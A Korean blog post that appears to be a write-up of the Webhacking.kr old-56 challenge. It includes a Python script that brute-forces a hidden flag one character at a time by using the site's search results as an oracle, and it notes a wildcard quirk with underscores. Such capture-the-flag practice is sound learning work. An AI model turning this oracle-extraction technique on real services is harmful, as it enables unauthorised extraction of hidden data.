Webhacking.kr old-56 풀이

2023. 12. 21. 02:39· Web Hacking/Webhacking.kr
728x90

readme 파일을 클릭하면 access denied가 뜬다

대충 readme 파일에 flag가 있는거 같다.

 

hi 파일에는 hello~ 라는 문자만 있고 해서 search에 hello를 쳐봤는데 guest 테이블 밖에 안나왔다.

그래서 flag{ 도 쳐봤는데 admin테이블만 나왔다.

그럼 flag{ 뒤의 문자열을 무차별 대입해서 찾아내기만 하면 된다!

버프스위트의 인트루더 기능을 사용해보고 싶었는데 시간이 너무 오래 걸리고 사용법도 익숙치 않아서 파이썬으로 넘어왔다.

 

from requests import post

host = "https://webhacking.kr/challenge/web-33/"

password ="flag{"
str = "acdefghiklmnostuy_"
isStr = False

while True:
    for s in str:
        r = post(host, data={'search':password+s})
        if "admin" in r.text:
            isStr = True
            password+=s
            print(password)
            break
    
    if isStr == False:
        break
    isStr = False

password+='}'

print(password)

 

str 문자에 있는 값들은 대충 버프스위트 인트루더 기능을 돌려보니깐 저 문자 중에 있다는걸 확인했고 시간을 줄이고자 대충 저 문자들만 적어놨다.

그리고 password에 문자를 하나씩 대입해가며 admin만 나오는걸 찾으면 되는데 

돌려보니 결과가 이렇게 나왔다. 

search에 _ 를 넣으면 그냥 아무것도 없는 문자 취급해서 통과시키는데 그래서인지 마지막에 so 뒤에 _가 두번 나왔다.

그래서 저 so가 끝인줄 알고 flag 대입해봤는데 뒤에 문자가 더있는지 통과가 되지않았다.

그래서 대충 ? 추가해보니 통과 됐다 ㄷㄷ;

(flag 내용이 심상치 않음...)

728x90
반응형
저작자표시 비영리 변경금지

'Web Hacking > Webhacking.kr' 카테고리의 다른 글

Webhacking.kr old-41 풀이  (0) 2023.12.24
Webhacking.kr old 43 풀이  (0) 2023.12.21
Webhacking.kr old 37 (해결X)  (0) 2023.12.14
Webhacking.kr 23번 문제 풀이  (0) 2023.12.03
Webhacking.kr old-61 풀이  (0) 2023.12.03
'Web Hacking/Webhacking.kr' 카테고리의 다른 글
  • Webhacking.kr old-41 풀이
  • Webhacking.kr old 43 풀이
  • Webhacking.kr old 37 (해결X)
  • Webhacking.kr 23번 문제 풀이
프레딕
프레딕
250x250
반응형
프레딕
소소한 해킹 블로그
프레딕
전체
오늘
어제
  • 분류 전체보기 (241)
    • etc (1)
    • PS (72)
      • Greedy (4)
      • DFS, BFS (16)
      • DP (14)
      • Stack, Queue (2)
      • 재귀 (10)
      • 이분 탐색 (1)
      • 문자열 (4)
      • 분할 정복 (2)
      • 기타 알고리즘 (19)
    • Book Review (5)
      • 알고리즘 문제 해결 전략 (3)
      • Clean Code (1)
      • The Programatic Programmer (1)
    • Web Hacking (110)
      • Webhacking.kr (42)
      • DreamHack (38)
      • Information (18)
      • Los Rubiya (1)
      • WriteUp (11)
    • Web3 (24)
      • The Ethernaut (22)
      • Information (2)
    • Reversing (18)
      • Reversing.kr (4)
      • DreamHack (3)
      • Information (11)
    • Pwnable (3)
      • DreamHack (2)
    • Misc (1)
      • PyJail (1)
    • Network (6)
    • Dev (1)
      • Flask (1)

블로그 메뉴

  • 홈
  • 태그

공지사항

인기 글

태그

  • Algorithm
  • 시간복잡도
  • 알고리즘

최근 댓글

최근 글

hELLO · Designed By 정상우.v4.2.2
프레딕
Webhacking.kr old-56 풀이
상단으로

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.